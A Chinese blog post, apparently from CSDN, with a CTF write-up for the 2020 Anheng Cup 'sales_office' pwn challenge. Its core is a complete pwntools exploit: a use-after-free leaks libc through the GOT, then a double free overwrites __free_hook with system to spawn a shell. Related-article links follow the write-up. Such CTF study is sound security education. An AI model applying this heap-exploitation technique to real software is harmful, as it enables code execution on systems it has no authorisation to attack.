(uaf/double free)2020安恒杯4月赛sales_office

最新推荐文章于 2024-03-06 21:05:06 发布
最新推荐文章于 2024-03-06 21:05:06 发布
阅读量1k 收藏 1
点赞数
分类专栏: 赛事复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42037374/article/details/105980465
版权
本文详细解析了UAF(Use After Free)与DoubleFree漏洞的原理及利用方法,通过IDA分析工具,展示了如何利用这些漏洞进行任意地址读写,最终实现系统权限的获取。文章还提供了具体的exp代码实例,帮助读者深入理解漏洞利用的技术细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

索引

基本信息

	Arch:     amd64-64-little
	RELRO:    Partial RELRO
	Stack:    Canary found
	NX:       NX enabled
	PIE:      No PIE (0x400000)
	dynamically
	18.04

IDA分析

add

在这里插入图片描述

show

在这里插入图片描述

free

在这里插入图片描述

思路
  1. 申请的chunk最大为0x60 存在uaf和double free
  2. 利用uaf没有将ptr置为NULL。修改fd指向got,然后得到libc_base
  3. 修改free_hook为system然后free 触发!

exp图

在这里插入图片描述

exp

#coding: utf-8
from pwn import *
context.log_level = 'debug'
local =1
if local:
    p = process("./sales_office")
    elf = ELF("./sales_office")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote()
    elf = ELF("")
    libc = elf.libc

def add(size,content):
    p.sendlineafter("choice:","1")
    p.sendlineafter("size of your house:",str(size))
    p.sendlineafter("please decorate your house:",content)

def show(index):
    p.sendlineafter("choice:","3")
    p.sendlineafter("index:\n",str(index))
def free(index): 
    p.sendlineafter("choice:","4")
    p.sendlineafter("index:\n",str(index))

def debug():
    print("[+]----pid%s"%proc.pidof(p)) 
    pause()    
lg=lambda address,data:log.success('[+]---->%s: '%(address)+hex(data))

def pwn():
    #-----uaf fd
    add(0x20,"a"*0x10) #0
    add(0x20,"b"*0x10) #1
    add(0x20,"/bin/sh\x00") #2
    
    free(1)
    free(0)
    add(8,p64(elf.got['puts'])) #3
    show(1)
    p.recvuntil("house:\n")
    libc_base = u64(p.recv(6).ljust(8,"\x00"))-0x809c0
    lg("libc_base",libc_base)
    #-----
    free_hook = libc_base+libc.sym['__free_hook']
    system_addr = libc_base +libc.sym['system']
    lg("free_hook",free_hook)
    #-----double free
    free(3)
    free(3)
    add(0x8,p64(free_hook))
    add(0x20,"p"*0x10)
    add(0x8,p64(system_addr))

    free(2)
    #debug()

    p.interactive()

if __name__ == "__main__":
    pwn()

知识点

uaf 利用特性:没有清空指针,如何可以修改fd指针可以达到任意地址读写的操作
double free特性: 能对同一个chunk free两次,结合uaf修改可以任意读写
#-----问题1
Cannot get main_arena's symbol address. Make sure you install libc debug file (libc6-dbg & libc6-dbg:i386 for debian package).
can't find heap info
#-----解决1
apt-get install lib32z1 lib32ncurses5
apt-get install lib32stdc++6
Jc^
关注
专栏目录
一道基础的uaf的两种食用方法double free
fuiifiuiii的博客
02-28 644
然后把它填上,free一个fastbin大小的块,修改fd指针为打hook的地址,创建两个块,第二个块就覆盖到打hook的地址那里了。以前看double free,总以为很难很难的样子,实际上动手调一调看看,也就是基本的uaf罢了。长度自定,可以堆溢出,但是这两种做法没有用到,以后考虑用它试着unlink啥的。先创建0x80的块,free掉,从unsorted bin 里打印泄露出libc。甚至不用改名字,出题人都给把名字叫好了(爱了爱了),这样子调试的时候很舒服。连接情况2->3->2。
一个简单的UAF/HeapOverflow fuzz demo学习
ULGANOY的博客
07-23 545
一个简单UAF/堆溢出fuzz检测代码demo的学习
[uaf + double free] de1ctf_2019_weapon
huzai9527的博客
09-22 387
[uaf + double free] de1ctf_2019_weapon 1. ida分析 删除的时候,只是检查了index范围,没有检查是否存在,存在double free 并且free后,指针没有置空,存在uaf 限制了chunk大小,需要通过uaf 构造fake chunk,修改chunk head的大小,构造unstored bin attack 2. 思路 1⃣️申请3个chunk 0,chunk 1,chunk 2,用chunk 0伪造chunk 1 的head,free chunk
2020元旦月-爆破鬼才-ZIP注释信息+CRC32爆破+outguess隐写爆破+生日字典
xnightmare的博客
01-03 2486
MISC 爆破鬼才 给出的是一个压缩包,压缩包中有注释信息,注释信息给出了解压密码的范围: 使用ARCHPC爆破即可得到密码:abc123 解压之后里面又是一个压缩包,压缩包里面包含几个文件: 使用010 Editor查看具体信息之后发现360给出的文件大小其实是不准确的,1.txt、2.txt、3.txt压缩前的大小分别为4 bytes、2 bytes、2 bytes,因此可以用CRC32碰...
初学堆 UAF漏洞及double free 利用手法(libc2.23)
weixin_66751120的博客
03-06 1969
UAF漏洞及double free 利用手法(libc2.23) 通过一道例题加深理解
2020.4月之杂项
cm_zl
04-25 679
blueshark 发现是取证题,首先寻找特殊字符串,找到一个what_you_want.7z 下面的16进制头是377abc是7z压缩包文件头,将之复制出到winhex。 保存7z压缩包,里面有一个加密文件。提示密码是蓝牙密码。 在wireshark中查找字符串,PIN,发现密码 最后打开文件,得到flag flag{快去试试吧!} ...
2020YCBCTF羊城官方Writeup.pdf
10-28
标题《2020YCBCTF羊城官方Writeup.pdf》中的“YCBCTF”指的是一种名为“羊城”的网络全竞(CTF),这是一个以网络全为主题的竞,CTF全称Capture The Flag,即“夺旗”,是一种信息全竞活动。...
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
密码可以简单到仅有4个数字。最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个全的环境。这个文档是对U2F协议一个阅读详细文当前的概述。
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4616
回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
2020年DASCTF——四月春季---Web-Writeup
SopRomeo的博客
04-29 3891
的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下 <?php show_source("index.php"); error_reporting(0); function write($data){ return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data){...
新手求救!!!
CSD_zhouzhou的博客
05-10 247
求哪位大神帮我做一下
理解 glibc malloc:主流用户态内存分配器实现原理
热门推荐
猫科龙
07-21 2万+
本篇文章主要完成了对《Understanding glibc malloc》的翻译工作。限于本人翻译水平与专业技术水平(纯粹为了了解内存分配而翻),本文章必定会有很多不足之处,请大家见谅,也欢迎大家的指正! 联系邮箱:974985526@qq.com。
So So So……
happmaoo的专栏
12-26 335
MorningMemoriesWakingatthebreakofmorning,Memoriespasswithoutwarning.Openingmyeyes,Iclearlysee,Imagesofonlyyouandme.ThroughoutthedayIreflectonyou,Rosepetalsoftnesstouchedbymorningdew.Yourswanlikegracea...
de1ctf_2019_weapon
z1r0的博客
03-10 475
de1ctf_2019_weapon 查看保护 一个uaf但是没有show功能 攻击思路:没有show功能,所以需要攻击stdout来泄露libc 1.利用double free这个特性将一个chunk的大小改成0x91,这里需要注意2.23下的检测size 2.释放掉0x91之后会产生unstorted bin,再将0x91变成0x71(fastbin 3.使用fastbin attack改fd为stdout这附近(要过size检测 申请到25dd这里,这里笔者本地关了随机化。打远程的时候需要爆破
BUUCTF-PWN刷题记录-24 & libc-2.29学习(下)
weixin_44145820的博客
05-29 1164
目录[2020 新春红包题]3 [2020 新春红包题]3
isccpwn2[不能获取索引地址空间的堆溢出](main_arena结构,got表存放)
九层台
05-28 791
main_arena里面的内容 pwndbg> x /20xg 0x7fed08ed9af0 0x7fed08ed9af0 <_IO_wide_data_0+304>: 0x00007fed08ed8260 0x0000000000000000 0x7fed08ed9b00 <__memalign_hook>: 0x00007fed08b9ae20 0x00007fe...
Double Free浅析(泄露堆地址的一种方法)
omnispace的博客
04-18 7496
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。double free的原理其实堆溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像普通的堆溢出伪造chunk然后free触发unlink...
uaf2.31 free hook
最新发布
03-31
### 关于 UAF 2.31 的 Free Hook 下载及相关资源 在讨论 glibc 版本 2.31 中的 Use-After-Free (UAF) 漏洞利用时,需注意该版本引入了许多全机制来防止此类漏洞被滥用。具体到 `free` 函数挂钩(hook),glibc 提供了一个名为 `__malloc_hook` `__free_hook` 的功能接口[^2]。这些钩子允许开发者自定义内存分配释放的行为。 然而,在现代 Linux 系统中,尤其是 glibc 2.24 及以上版本,官方已经移除了对传统 malloc/free 钩子的支持,转而推荐使用更全的方式实现类似的功能,例如通过 LD_PRELOAD 加载共享库文件[^3]。因此,如果目标环境运行的是 glibc 2.31,则无法直接依赖传统的 `__free_hook` 方法。 对于寻找与 UAF 利用相关的工具或插件,建议关注以下方向: #### 使用 LD_PRELOAD 实现 Custom Hooks 可以通过编写一个简单的 C 文件并编译成 `.so` 动态链接库的形式加载至目标进程中。下面是一个基本示例代码片段展示如何重写 `free()` 行为: ```c #include <stdio.h> #include <dlfcn.h> void (*original_free)(void*) = NULL; // 自定义 free 函数逻辑 void custom_free(void* ptr){ printf("Custom free called on %p\n",ptr); if(!original_free){ original_free=dlsym(RTLD_NEXT,"free"); } original_free(ptr); } // 替代默认的 free() #define free custom_free ``` 将上述代码保存为 `custom_hooks.c` 并执行如下命令构建动态库: ```bash gcc -shared -o custom_hooks.so -fPIC custom_hooks.c -ldl ``` 之后可通过设置环境变量让指定程序加载此 so 文件: ```bash export LD_PRELOAD=./custom_hooks.so ./vulnerable_program ``` 这种方法不仅适用于研究学习目的下的调试分析,也广泛应用于实际开发中的性能优化或者日志记录等方面[^4]。 #### 工具推荐 一些开源项目专注于逆向工程、二进制漏洞挖掘以及自动化脚本生成等领域,可能间接帮助理解甚至实践某些特定条件下的 double-free 或 use-after-free 攻击手法。以下是几个值得探索的方向: - **ROPgadget**: 辅助查找 ROP 链所需 gadget。 - **pwntools**: Python 库形式提供多种 pwn 技巧封装支持。 - **angr**: 符号执行框架可用于路径约束求解等复杂场景模拟验证工作。 请注意合法合规地开展任何网络全活动至关重要,未经授权擅自测试他人系统属于违法行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值